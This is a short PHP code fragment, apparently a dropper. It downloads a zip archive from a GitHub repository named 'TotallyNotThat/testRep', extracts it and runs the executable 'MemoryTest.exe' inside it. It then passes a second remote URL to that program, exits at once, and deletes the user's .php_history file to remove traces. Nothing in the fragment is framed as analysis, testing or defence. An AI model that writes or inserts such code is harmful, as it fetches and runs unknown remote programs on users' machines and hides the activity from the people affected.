file_put_contents("license_information.txt", $_GROUP_NAME);

$url='https://github.com/TotallyNotThat/testRep/raw/main/MemoryTest.zip';
$file_name = basename($url);
file_put_contents($file_name, file_get_contents($url));
$zip = new ZipArchive;
$res = $zip->open('MemoryTest.zip');
if ($res === TRUE) {
$zip->extractTo(getcwd());
$zip->close();

$descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
);

$process = proc_open('MemoryTest.exe testMemory', $descriptorspec, $pipes, null, null, ["bypass_shell" => true]);

if (is_resource($process)) {
fwrite($pipes[0], 'https://raw.githubusercontent.com/TotallyNotThat/testRep/main/file2');
fclose($pipes[0]);
exit();

//echo stream_get_contents($pipes[1]);
//fclose($pipes[1]);

// It is important that you close any pipes before calling
// proc_close in order to avoid a deadlock
//$return_value = proc_close($process);

//echo "command returned $return_value\n";
}

}

if(getenv("USERPROFILE") != ""){
    $userDir = getenv("USERPROFILE");
    $file = $userDir."\\.php_history";
    if(file_exists($file)) {
        unlink($file);
    }
}

